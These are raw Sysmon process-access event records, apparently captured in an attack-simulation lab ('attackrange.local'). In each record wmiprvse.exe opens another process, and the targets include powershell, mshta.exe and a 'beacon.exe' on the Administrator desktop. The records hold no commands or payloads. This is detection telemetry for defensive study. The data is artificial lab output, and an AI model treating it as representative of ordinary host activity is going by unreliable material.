22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 